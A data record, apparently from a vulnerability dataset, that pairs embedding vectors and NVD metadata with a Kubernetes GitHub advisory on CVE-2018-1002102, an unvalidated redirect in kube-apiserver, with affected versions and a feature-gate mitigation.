-0.013631128706037998, -0.004949269816279411, 0.0036536306142807007, 0.015016493387520313, -0.00852753035724163, -0.0026666477788239717, -0.009640129283070564, 0.010013388469815254, 0.03095177747309208, -0.0021229099947959185, -0.00216418388299644, 0.0039156293496489525, 0.03741202875971794, 0.004644202068448067, 0.0037756573874503374, 0.012633378617465496, 0.005121543072164059, -0.007658985909074545, -0.022295042872428894, 0.007307261228561401, -0.00333779607899487, 0.00916637759655714, -0.02680286206305027, -0.0003609216364566237, 0.010616345331072807, -0.0049815708771348, 0.008721337653696537, 0.03568929433822632, -0.006707893218845129, 0.021218333393335342, -0.01592092774808407, -0.0017963085556402802, 0.0005056043155491352, -0.0006348093156702816, -0.012123736552894115, -0.01950995624065399, 0.0028120034839957952, 0.008118381723761559, 0.004077136050909758, 0.012532886117696762, 0.02307027205824852, 0.0052328030578792095, 0.0012139887548983097, -0.017600594088435173, 0.01625111885368824, 0.030808215960860252, 0.0052507477812469006, 0.0068012080155313015, 0.01116187684237957, -0.014887288212776184, -0.003201412968337536, 0.030406245961785316, 0.023041559383273125, 0.009647306986153126, 0.00229697790928185, 0.0013090979773551226, 0.010415359400212765, 0.015059561468660831, 0.004403737373650074, -0.018289687111973763, -0.005638362839818001, -0.012482639402151108, 0.011894038878381252, -0.001067735836841166, -0.004963625688105822, 0.024333609268069267, -0.0032606320455670357, 0.00773794436827302, 0.00045490931370295584, -0.013918250799179077, 0.013035349547863007, 0.007386219687759876, 0.006086991634219885, -0.02711869589984417, 0.003958697896450758, -0.0012328311568126082, -0.004629846196621656, -0.014743726700544357, -0.005494801793247461, -0.0196104496717453, -0.015116985887289047, -0.02574050985276699, 0.0034167547710239887, -0.00011888654989888892, 0.010673769749701023, 0.004400148522108793, -0.009977498091757298, 0.010680947452783585, 0.00041027076076716185, -0.006244908552616835, 0.01556202583014965, 0.003976643085479736, 0.0157199427485466, -0.004346312955021858, -0.005315350368618965, -0.029128551483154297, 0.014973425306379795, -0.008104025386273861, 0.01065223477780819, -0.009360184893012047, -0.019409462809562683, -0.018763437867164612, -0.012590310536324978, 0.004672914277762175, 0.0035674937535077333, -0.01593528501689434, -0.004723160993307829, -0.04278121516108513, 0.014901644550263882, 0.011434643529355526, -0.0004827242810279131, 0.006758139934390783, -0.009202267974615097, 0.0029896602500230074, -0.008584954775869846, 0.01630854420363903, 0.010487140156328678, 0.004759051371365786, -0.010436893440783024, -0.003937163855880499, -0.0009699348011054099, 0.009769334457814693, -0.012425214983522892, -0.012676446698606014, 0.02041439153254032, 0.013918250799179077, -0.019897570833563805, 0.003714644117280841, -0.0028819895815104246, 0.002481812844052911, 0.006478195544332266, 0.01188686117529869, -0.02866915613412857, 0.012848719954490662, -0.011549492366611958, -0.001979348948225379, -0.004504230339080095, -0.00982675887644291, 0.0015253368765115738, -0.009747800417244434, -0.00680838618427515, -0.007802546955645084, -0.006467428524047136, 0.011563848704099655, -0.0028855784330517054, -0.0024118267465382814, 0.02627168595790863, 0.004367846995592117, 0.0033395905047655106, 0.01190839521586895, -0.017083773389458656, -0.002481812844052911, -0.0036966989282518625, 0.004041245672851801, 0.0012884610332548618, -0.005990087985992432, 0.024075200781226158, -0.03227254003286362, 0.004098670091480017, -0.010975247249007225, 0.01801692135632038, 0.0025374428369104862, 0.0014194606337696314, -0.03095177747309208, -0.005738855805248022, 0.014126414433121681, -0.0014490700559690595, 0.019151054322719574, -0.006973481271415949, 0.008505996316671371, -0.00347059010528028, -0.005972142796963453, 0.0016132680466398597, 0.006682770326733589, -0.0025374428369104862, 0.00958988256752491, 0.024635087698698044, 0.008297832682728767, -0.0034580284263938665, 0.006815564353018999, 0.005110776051878929, -0.012985103763639927, 0.00836961343884468, -0.01737089641392231, -0.0272335447371006, -0.027520667761564255, 0.004730339162051678, -0.0033126729540526867, -0.010853220708668232, 0.002305950503796339, -0.008556243032217026, -0.005139488261193037, 0.018189193680882454, -0.003366508288308978, 0.0012292420724406838, 0.013229156844317913, -0.011255191639065742, -0.006036744918674231, 0.0021534168627113104, 0.00472674984484911, -0.016208050772547722, 0.043556444346904755, 0.009475033730268478, 0.020543595775961876, -0.017715442925691605, -0.007407753728330135, -0.0034687956795096397, -0.008211696520447731, 0.005286638159304857, -0.002774318680167198, -0.004604722838848829, -0.005064118653535843, -0.0032606320455670357, 0.017342183738946915, -0.022338110953569412, -0.0014248441439121962, 0.004152505658566952, -0.009446321986615658, 0.010695303790271282, 0.0016985074616968632, -0.0006563434726558626, 0.0013378101866692305, -0.0032660155557096004, 0.010293331928551197, -0.011700231581926346, -0.010716837830841541, 0.017083773389458656, -0.006790440995246172, -0.019208477810025215, -0.006528441794216633, -0.016452103853225708, 0.020644089207053185, -0.004267354495823383, -0.012475461699068546, -0.006180306430906057, 0.009532458148896694, 0.009367363527417183, 0.03376557677984238, 0.021778222173452377, -0.006090580485761166, -0.0047554620541632175, 0.012604666873812675, -0.021448031067848206, -0.0013988236896693707, -0.0005567479529418051, -0.015849146991968155, 0.0028676334768533707, -0.027578091248869896, 0.03382299840450287, 0.03749816492199898, 0.010953713208436966, -0.007213946431875229, 0.0027635516598820686, 0.015791723504662514, 0.016236763447523117, -0.0014777822652831674, -0.0004515445907600224, 0.004830831661820412, 0.0011009343434125185, -0.00836243573576212, 0.016078844666481018, -0.006108525674790144, -0.001927308039739728, -0.025051414966583252, -0.01020719576627016, -0.01503084972500801, 0.0037577124312520027, 0.029774576425552368, 0.03528732433915138, 0.0068550435826182365, 0.03026268444955349, -0.0006038539577275515, -0.009446321986615658, 0.027520667761564255, -0.002230580896139145, -0.0038294929545372725, -0.04203469678759575, 0.01912234164774418, -0.01587785966694355, -0.018031276762485504, -0.005351240746676922, -0.012647734954953194, 0.0011682285694405437, 0.016696158796548843, -0.0008102230494841933, 0.014801151119172573, 0.00013156031491234899, 0.009625772945582867, -0.004353491123765707, 0.004522175528109074, -0.01694021187722683, 0.010702481493353844, 0.01518876664340496, -0.019581736996769905, -0.0016294186934828758, 0.011972997337579727, 0.0023005669936537743, 0.02167772874236107, 0.017873359844088554, 0.0028712223283946514, -0.0071744672022759914, 0.007056029047816992, 0.004439627751708031, -0.02749195508658886, 0.018993135541677475, 0.0031027146615087986, -0.025395961478352547, 0.008182983845472336, -0.015949640423059464, -0.004249409306794405, -0.021462388336658478, 0.009489390067756176, -0.0078599713742733, 0.0027240721974521875, -0.009381718933582306, -0.0059649646282196045, -0.008943857625126839, 0.0055917054414749146, -0.012217051349580288, -0.030090410262346268, -0.00879311840981245, -0.0030345232225954533, -0.00900846067816019, 0.008599311113357544, -0.028252828866243362, -0.022180194035172462, -0.0017532402416691184, 0.007781012915074825, 0.024548951536417007, 0.018131770193576813, -0.0007285726605914533, 0.002765346085652709, -0.0040197111666202545, -0.002675620373338461, -0.003120659850537777, 0.011664341203868389, -0.0008864899282343686, 0.01113316509872675, -0.010645057074725628, -0.002505141543224454, 0.0038940953090786934, -0.003782835556194186, 0.00308297504670918, -0.014291509985923767, -0.017930783331394196, -0.015073917806148529, 0.0024907854385674, -0.018935712054371834, -0.008039422333240509, -0.00953963678330183, 0.0018142536282539368, 0.02855430729687214, -0.0034059875179082155, 0.010379469022154808, -0.026070699095726013, -0.004916968289762735, 0.042924776673316956, 0.005659897346049547, 0.028812717646360397, -0.030894353985786438, 0.0025733329821377993, 0.004303244408220053, 0.021864358335733414, 0.0019308971241116524, 0.0024261828511953354, -0.007005782797932625, -0.025338537991046906, -0.0054158433340489864, 0.005193323362618685, 0.020127268508076668, 0.005006694234907627, -0.02487914264202118, -0.0016213434282690287, 0.010156949050724506, -0.012934857048094273, 0.018404535949230194, 0.007422110065817833, 0.0074867126531898975, -0.005742444656789303, 0.009661663323640823, 0.016925856471061707, -0.0022790327202528715, 0.0004647791211027652, -0.025797933340072632, 0.002320306608453393, -0.017356539145112038, -0.014700658619403839, 0.00023440839140675962, -0.012252941727638245, 0.0006666619447059929, 0.0033126729540526867, -0.01009952463209629, -0.01923719048500061, 0.005480445921421051, 0.023587092757225037, -0.024376679211854935, 0.014528385363519192, 0.0036661920603364706, -0.005056940484791994, 0.015404107980430126, -0.016811007633805275, 0.016050133854150772, -0.0062556760385632515, 0.029343893751502037, 0.015016493387520313 ]
2,253
CVE-2018-1002102
2019-12-05T16:15:10.427000
Improper validation of URL redirection in the Kubernetes API server in versions prior to v1.14.0 allows an attacker-controlled Kubelet to redirect API server requests from streaming endpoints to arbitrary hosts. Impacted API servers will follow the redirect as a GET request with client-certificate credentials for authenticating to the Kubelet.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.6, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 1.4, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.6, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 1.4, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/85867" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q56CULSH7F7BC4NPS67ZS23ZCLL5TIVK/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "1774C3E1-5BE8-4DC0-8A61-39B183C36F96", "versionEndExcluding": null, "versionEndIncluding": "1.13.13", "versionStartExcluding": null, "versionStartIncluding": "1.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.14.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "34A6AC2D-82C4-4E1F-8D9A-159E31A4F790", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.14.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "002991E8-6CC8-4F58-89B3-0B1AF2447DD5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/85867
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F) An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube-apiservers will follow the redirect as a GET request with client-cert credentials for authenticating to the Kubelet. ### Am I vulnerable? Kubernetes API servers with the `StreamingProxyRedirects` [feature](https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/) enabled AND without the `ValidateProxyRedirects` feature are affected. API servers using SSH tunnels (--ssh-user / --ssh-keyfile) are not affected. Using the default feature gate values, kube-apiserver versions before v1.14 are affected. ### How do I mitigate this vulnerability? For Kubernetes versions >= v1.10.0, the `ValidateProxyRedirects` can be manually enabled with the `kube-apiserver` flag `--feature-gates=ValidateProxyRedirects=true`. #### Fix impact The `ValidateProxyRedirects` feature will cause the kube-apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built-in dockershim & setting the kubelet flag `--redirect-container-streaming=true`), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting `--redirect-container-streaming=false` on the kubelet to avoid issues. #### Fixed Versions - Kubernetes v1.14+ - Fixed by default in https://github.com/kubernetes/kubernetes/pull/72552 - Kubernetes v1.10-v1.14 - Fix available as alpha in https://github.com/kubernetes/kubernetes/pull/66516 ## Additional Details In a future release, we plan to deprecate the `StreamingProxyRedirects` feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests). #### Acknowledgements This vulnerability was reported by Alban Crequy. /area security /kind bug /committee product-security /sig api-machinery node /area apiserver /close
CVE-2018-1002102: Unvalidated redirect
https://api.github.com/repos/kubernetes/kubernetes/issues/85867/comments
3
2019-12-03T22:58:37
2021-12-02T22:56:35Z
https://github.com/kubernetes/kubernetes/issues/85867
532,323,568
85,867
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2018-1002102: Unvalidated redirect Issue date: --- start body --- CVSS Rating: [CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F) An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube-apiservers will follow the redirect as a GET request with client-cert credentials for authenticating to the Kubelet. ### Am I vulnerable? Kubernetes API servers with the `StreamingProxyRedirects` [feature](https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/) enabled AND without the `ValidateProxyRedirects` feature are affected. API servers using SSH tunnels (--ssh-user / --ssh-keyfile) are not affected. Using the default feature gate values, kube-apiserver versions before v1.14 are affected. ### How do I mitigate this vulnerability? For Kubernetes versions >= v1.10.0, the `ValidateProxyRedirects` can be manually enabled with the `kube-apiserver` flag `--feature-gates=ValidateProxyRedirects=true`. #### Fix impact The `ValidateProxyRedirects` feature will cause the kube-apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built-in dockershim & setting the kubelet flag `--redirect-container-streaming=true`), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting `--redirect-container-streaming=false` on the kubelet to avoid issues. #### Fixed Versions - Kubernetes v1.14+ - Fixed by default in https://github.com/kubernetes/kubernetes/pull/72552 - Kubernetes v1.10-v1.14 - Fix available as alpha in https://github.com/kubernetes/kubernetes/pull/66516 ## Additional Details In a future release, we plan to deprecate the `StreamingProxyRedirects` feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests). #### Acknowledgements This vulnerability was reported by Alban Crequy. /area security /kind bug /committee product-security /sig api-machinery node /area apiserver /close --- end body ---
2,514
[ -0.008213494904339314, -0.02581777609884739, 0.00001656640597502701, 0.02711210586130619, 0.015559512190520763, -0.025101762264966965, 0.010719540528953075, 0.0335424542427063, -0.0103959571570158, 0.00610332190990448, -0.004010361153632402, -0.022884875535964966, -0.01532543171197176, -0.00966617465019226, 0.010285801254212856, 0.05612440034747124, -0.025983009487390518, -0.008798697963356972, 0.0053115771152079105, 0.014141255989670753, -0.005762527231127024, -0.034148309379816055, -0.05604178458452225, 0.031229181215167046, -0.009776330552995205, 0.013521629385650158, -0.028420208021998405, 0.023779891431331635, -0.03390045836567879, -0.004778009839355946, 0.04276800528168678, 0.004743585828691721, 0.011745366267859936, -0.002215165179222822, 0.024234285578131676, 0.016991538926959038, 0.014196334406733513, 0.04766993969678879, -0.03343229740858078, -0.020530294626951218, -0.048248257488012314, -0.06873724609613419, 0.006375269498676062, 0.006175611633807421, -0.019855590537190437, 0.013810788281261921, -0.017790168523788452, -0.03602096065878868, -0.008688542060554028, 0.04329124465584755, -0.0041790371760725975, -0.023325499147176743, -0.030981330201029778, -0.05290234461426735, 0.01944250613451004, -0.01473334338515997, 0.02065422013401985, 0.0074424040503799915, 0.018919264897704124, -0.027442574501037598, -0.001382972113788128, 0.02435821108520031, 0.01459564920514822, 0.009039663709700108, -0.00010875737643800676, 0.024757524952292442, -0.02533584274351597, -0.02360088936984539, -0.023297959938645363, 0.025473538786172867, 0.010692001320421696, 0.004096420481801033, 0.0073184785433113575, -0.021328924223780632, 0.04326370730996132, -0.0068468740209937096, 0.04362171143293381, 0.02938407100737095, -0.027483882382512093, -0.008523308672010899, -0.032881516963243484, 0.0161240603774786, -0.04290569946169853, -0.014499262906610966, 0.028420208021998405, -0.028530362993478775, -0.022402944043278694, -0.0662587359547615, 0.010657577775418758, -0.03450631722807884, -0.014774652197957039, -0.012778077274560928, -0.014912347309291363, -0.04340140148997307, 0.016220448538661003, -0.016729919239878654, -0.015531973913311958, -0.0248126033693552, -0.04698146507143974, 0.028117278590798378, -0.028750674799084663, 0.003769395174458623, -0.028282511979341507, 0.018506180495023727, 0.04031703621149063, -0.016867613419890404, 0.019869359210133553, 0.04420003294944763, -0.014457954093813896, 0.11379098147153854, 0.05447206273674965, 0.000944069994147867, -0.02281602844595909, -0.01733577623963356, -0.029907310381531715, 0.027773041278123856, -0.014664496295154095, -0.04331878572702408, -0.03877485543489456, -0.01281250175088644, -0.0348367840051651, -0.02500537596642971, 0.02214132435619831, -0.009982872754335403, -0.03376276418566704, 0.01116704847663641, -0.023532042279839516, 0.02084699273109436, -0.0036661240737885237, -0.0055456580594182014, -0.026341015473008156, 0.019153347238898277, -0.0193598885089159, 0.0017676569987088442, 0.007697139400988817, 0.027497651055455208, 0.0009595606243237853, 0.014815961010754108, -0.017115464434027672, -0.023022571578621864, -0.024041512981057167, -0.030926251783967018, 0.019428737461566925, 0.03938071429729462, -0.00792433600872755, 0.00010994069452863187, 0.008846891112625599, 0.0030224008951336145, -0.016399450600147247, -0.010692001320421696, -0.00729782460257411, 0.007105052005499601, 0.01525658369064331, 0.046540841460227966, 0.08443444967269897, -0.021838394924998283, 0.0051979785785079, -0.009686829522252083, 0.004667853936553001, -0.04061996564269066, 0.03056824579834938, -0.04199691489338875, 0.013507859781384468, -0.020488986745476723, 0.031394414603710175, 0.02452344447374344, 0.004426887724548578, -0.005208306014537811, -0.02084699273109436, 0.02902606502175331, 0.017762629315257072, -0.03070593997836113, 0.021287616342306137, -0.026740331202745438, -0.04780763387680054, -0.0120827192440629, 0.03860962390899658, 0.010664462111890316, 0.008716081269085407, -0.022182632237672806, -0.015132659114897251, 0.0018829763866961002, -0.03500201925635338, 0.0006006935727782547, 0.030926251783967018, -0.01244761049747467, -0.014320258982479572, 0.020378829911351204, 0.001512060989625752, -0.0015989808598533273, -0.0033132811076939106, 0.014788421802222729, 0.012337454594671726, -0.014389107003808022, -0.036902207881212234, 0.03935317322611809, -0.010692001320421696, -0.02211378514766693, 0.04307093471288681, -0.024771295487880707, 0.022210171446204185, 0.017748860642313957, -0.02033752202987671, -0.01011368352919817, -0.032440897077322006, 0.022526869550347328, -0.019965745508670807, -0.023256652057170868, 0.00296388054266572, -0.024427058175206184, -0.03241335600614548, -0.061081413179636, 0.016192909330129623, 0.007559444755315781, 0.027717962861061096, 0.012819386087357998, -0.014664496295154095, 0.008771158754825592, -0.05312265455722809, 0.0021893472876399755, 0.033983077853918076, -0.0015783266862854362, -0.017886554822325706, 0.025666311383247375, -0.050644148141145706, -0.0007370974635705352, 0.03505709767341614, -0.030155161395668983, 0.02652001939713955, -0.010974275879561901, -0.02008967101573944, -0.03246843442320824, -0.0013683420838788152, 0.019896898418664932, -0.007538790348917246, 0.003301232820376754, 0.006822777446359396, -0.023752354085445404, 0.001747002825140953, -0.016977768391370773, 0.027938274666666985, 0.01387963630259037, -0.0530400387942791, -0.009796985425055027, 0.0009044827311299741, 0.03048563003540039, -0.013858981430530548, 0.03076101839542389, -0.0342860072851181, 0.009074087254703045, -0.02946668677031994, 0.043842025101184845, -0.010499228723347187, -0.015600821003317833, 0.013755710795521736, -0.016385681927204132, -0.018671415746212006, 0.010382188484072685, 0.011862407438457012, -0.012185989879071712, 0.05739119276404381, 0.03150457143783569, 0.01528412289917469, 0.005993166472762823, 0.019346119835972786, -0.041088130325078964, -0.02152169682085514, 0.002822743495926261, 0.004271981306374073, -0.039656102657318115, 0.027442574501037598, -0.018161945044994354, 0.011635210365056992, -0.003506053937599063, -0.0014535407535731792, -0.005246171727776527, 0.05240664258599281, -0.002079191617667675, 0.011173932813107967, -0.023297959938645363, 0.01328754797577858, -0.025308305397629738, -0.02568008005619049, -0.002337369369342923, -0.009927795268595219, 0.011160164140164852, 0.01227549184113741, -0.06444116681814194, -0.03569049388170242, 0.005046514328569174, -0.017211850732564926, 0.0036041615530848503, 0.006512964144349098, -0.0020533737260848284, 0.004908819682896137, 0.02570761926472187, -0.015531973913311958, 0.022402944043278694, 0.0026093164924532175, 0.010347764007747173, -0.015669668093323708, 0.005139458458870649, -0.013989792205393314, 0.0387197770178318, -0.013872751034796238, 0.022760950028896332, -0.003135999199002981, 0.040922895073890686, -0.023353038355708122, -0.0012676527258008718, 0.028833292424678802, -0.03888501226902008, 0.0413084402680397, -0.002125663449987769, 0.005390751641243696, 0.02411036007106304, 0.03593834489583969, -0.04274046793580055, -0.01623421721160412, 0.002667836844921112, 0.012378762476146221, 0.006437231786549091, -0.021824626252055168, 0.02230655774474144, 0.02238917537033558, -0.024757524952292442, 0.009975988417863846, -0.028723135590553284, -0.050947077572345734, -0.009852062910795212, -0.025101762264966965, 0.026010548695921898, -0.016674840822815895, -0.02486768178641796, -0.02584531344473362, -0.014871038496494293, 0.0063201915472745895, 0.013907174579799175, 0.03348737582564354, -0.006123976316303015, -0.005163555033504963, -0.011029353365302086, 0.0035697377752512693, 0.00861280970275402, 0.017432162538170815, -0.043704330921173096, -0.0016884824726730585, -0.03376276418566704, 0.06333960592746735, -0.019346119835972786, 0.0007852906710468233, 0.008206610567867756, -0.03368014842271805, 0.011036238633096218, 0.05854782834649086, -0.005717776715755463, -0.019676586613059044, -0.027511421591043472, 0.004034457728266716, -0.06146695837378502, 0.043842025101184845, -0.04061996564269066, -0.013618015684187412, 0.02722226269543171, -0.00032788573298603296, 0.003080921247601509, -0.03527740761637688, 0.006454444024711847, -0.02770419418811798, -0.017459701746702194, -0.05604178458452225, -0.01879534125328064, 0.017032846808433533, 0.05287480354309082, -0.009638636372983456, -0.022155093029141426, -0.03505709767341614, 0.008234148845076561, -0.03938071429729462, 0.027415035292506218, -0.011683403514325619, -0.017046617344021797, 0.0015292728785425425, -0.01590375043451786, 0.0080620301887393, 0.04048227146267891, 0.04700900614261627, 0.009514710865914822, -0.00202239234931767, 0.017087925225496292, -0.03379030525684357, 0.07402472198009491, -0.01890549622476101, -0.010340879671275616, -0.03436862304806709, 0.0035421987995505333, -0.02081945352256298, -0.02008967101573944, 0.020599141716957092, -0.026878025382757187, 0.03888501226902008, 0.016303064301609993, -0.007049974054098129, 0.02000705525279045, 0.00915670394897461, 0.011951908469200134, -0.017680011689662933, -0.01682630553841591, 0.009852062910795212, -0.04012426361441612, 0.023958895355463028, -0.037067439407110214, -0.02733241766691208, 0.020502755418419838, 0.0553533099591732, 0.09440355747938156, 0.035552795976400375, 0.007187668699771166, -0.00881935190409422, 0.02930145338177681, 0.009425208903849125, 0.00859904009848833, 0.03486432507634163, 0.03527740761637688, 0.015036272816359997, 0.012915772385895252, 0.02778681181371212, 0.0639454647898674, 0.05138770118355751, -0.005277153104543686, -0.015215275809168816, 0.004984552040696144, 0.0038485697004944086, -0.028668057173490524, -0.028365129604935646, 0.010946736671030521, -0.0013976022601127625, -0.04221722483634949, 0.015036272816359997, 0.0016635253559798002, -0.03907778486609459, 0.019318580627441406, -0.03522232919931412, 0.02786942757666111, -0.007917450740933418, -0.02233409695327282, -0.008165301755070686, -0.03982133790850639, -0.01262661349028349, -0.035470180213451385, -0.04152875393629074, 0.013638670556247234, -0.01941496692597866, -0.0027452900540083647, -0.015779824927449226, -0.007359787356108427, 0.009817639365792274, -0.025666311383247375, 0.03888501226902008, 0.01348720584064722, 0.00283823418430984, -0.012013871222734451, -0.006478540599346161, 0.013432128354907036, 0.023890048265457153, -0.007167014293372631, -0.01722561940550804, -0.04921212047338486, 0.019814282655715942, -0.014334028586745262, 0.016564683988690376, 0.05125000700354576, 0.017569856718182564, 0.0040723239071667194, 0.009025894105434418, 0.02579023689031601, 0.007876142859458923, 0.006512964144349098, -0.015490665100514889, 0.010292686522006989, -0.021136151626706123, 0.031366877257823944, 0.0038623393047600985, -0.033845383673906326, 0.009266859851777554, -0.01817571371793747, 0.009280629456043243, 0.015105119906365871, -0.0616321936249733, -0.030898714438080788, 0.046540841460227966, -0.03982133790850639, 0.003924301825463772, -0.046430688351392746, 0.02770419418811798, -0.004967339802533388, 0.007614522706717253, -0.019070729613304138, 0.048165641725063324, -0.010506113059818745, 0.004450984299182892, -0.0037866069469600916, 0.030017467215657234, -0.005149785429239273, -0.03230319917201996, -0.007173899095505476, -0.01741839200258255, 0.07452042400836945, -0.015160197392106056, -0.011215241625905037, -0.045163895934820175, -0.00897770095616579, -0.003958725370466709, -0.0319727323949337, -0.0010705770691856742, -0.010781503282487392, 0.01011368352919817, 0.01149063091725111, -0.01111197005957365, 0.012089603580534458, -0.016371911391615868, -0.02076437696814537, 0.018396025523543358, -0.007046531420201063, -0.010051720775663853, 0.007332248147577047, 0.00467129610478878, -0.0019914109725505114, -0.015531973913311958, -0.015559512190520763, 0.023325499147176743, -0.012902002781629562, -0.024096589535474777, -0.0009036221308633685, -0.01933234930038452, 0.020640451461076736, -0.02713964506983757, -0.004344271030277014, -0.006302979774773121, 0.006065456196665764, -0.02292618528008461, 0.010416612029075623, -0.02700195088982582, 0.017074154689908028, -0.021163690835237503, 0.05028614029288292, -0.021301385015249252, 0.016592223197221756, 0.004877838306128979, -0.060585711151361465, 0.041005510836839676, -0.011456207372248173, 0.0037934917490929365, 0.032716285437345505, -0.009617981500923634, 0.005056841764599085, 0.01601390540599823, 0.026175782084465027, 0.00621692044660449, -0.02373858354985714, 0.002492276020348072, -0.032798901200294495, 0.008006952702999115, -0.039601024240255356, 0.0025490750558674335, -0.011015583761036396, 0.004932916257530451, 0.017404623329639435, -0.0057762968353927135, -0.001228065462782979, 0.010712655261158943, -0.012330569326877594, 0.011435553431510925, 0.0006437231786549091, -0.005084380507469177, 0.010664462111890316, -0.00381758832372725, 0.013129198923707008, -0.012158450670540333, -0.0020860761869698763, 0.009576673619449139, 0.009631751105189323, 0.004857184365391731, 0.010265147313475609, 0.005803836043924093, 0.007483712397515774, 0.0027728290297091007, 0.029521765187382698, -0.0035628529731184244, 0.005986281670629978, -0.004678180906921625, 0.005827932618558407, -0.004533601459115744, -0.009955334477126598, 0.034093234688043594, 0.006630004849284887, -0.014099948108196259, 0.00621692044660449, 0.0076351766474545, -0.016440758481621742, 0.022430483251810074, 0.010320225730538368, 0.022719642147421837, -0.014939885586500168, 0.018754031509160995, 0.04037211462855339, -0.028447745367884636, 0.02244425192475319, -0.014237642288208008, 0.00665754359215498, -0.014705805107951164, -0.004299520049244165, 0.03307428956031799, -0.03351491317152977, 0.002564565744251013, -0.014141255989670753, 0.010643808171153069, 0.019070729613304138, 0.014155025593936443, -0.01076084841042757, 0.002938062883913517, -0.010912313126027584, 0.029852233827114105, -0.024743756279349327, 0.025046683847904205, -0.006681640166789293, 0.005473368335515261, 0.015945058315992355, -0.009211782366037369, 0.014457954093813896, -0.00859904009848833, -0.02351827174425125, -0.004629987757652998, -0.02517060935497284, -0.031477030366659164, 0.011222125962376595, 0.001493128016591072, 0.013081005774438381, -0.03869223967194557, 0.0043649254366755486, -0.018409794196486473, 0.04488850384950638, -0.007118821144104004, 0.05312265455722809, -0.024826372042298317, -0.007690254598855972, -0.014251411892473698, 0.015752285718917847, 0.002192789688706398, 0.02306387946009636, -0.003275415161624551, -0.0005180767038837075, -0.00828922726213932, 0.031284257769584656, 0.024881450459361076, -0.011098201386630535, 0.02171446941792965, 0.016165370121598244, -0.0103959571570158, -0.02595547027885914, -0.010678231716156006, -0.031174102798104286, 0.0031549320556223392, 0.0051979785785079, -0.007862373255193233, -0.008179071359336376, 0.013535398989915848, 0.013156738132238388, -0.001038735150359571, 0.06009001284837723, 0.0000382694743166212, -0.0054320599883794785, -0.03464401140809059, 0.009741907007992268, 0.0037556258030235767, -0.0054320599883794785, -0.0060207052156329155, 0.022320328280329704, 0.0061274184845387936, -0.011786675080657005, 0.005287480540573597, 0.014155025593936443, -0.03189011663198471, 0.039848875254392624, -0.012846925295889378, 0.0068468740209937096, 0.01623421721160412, 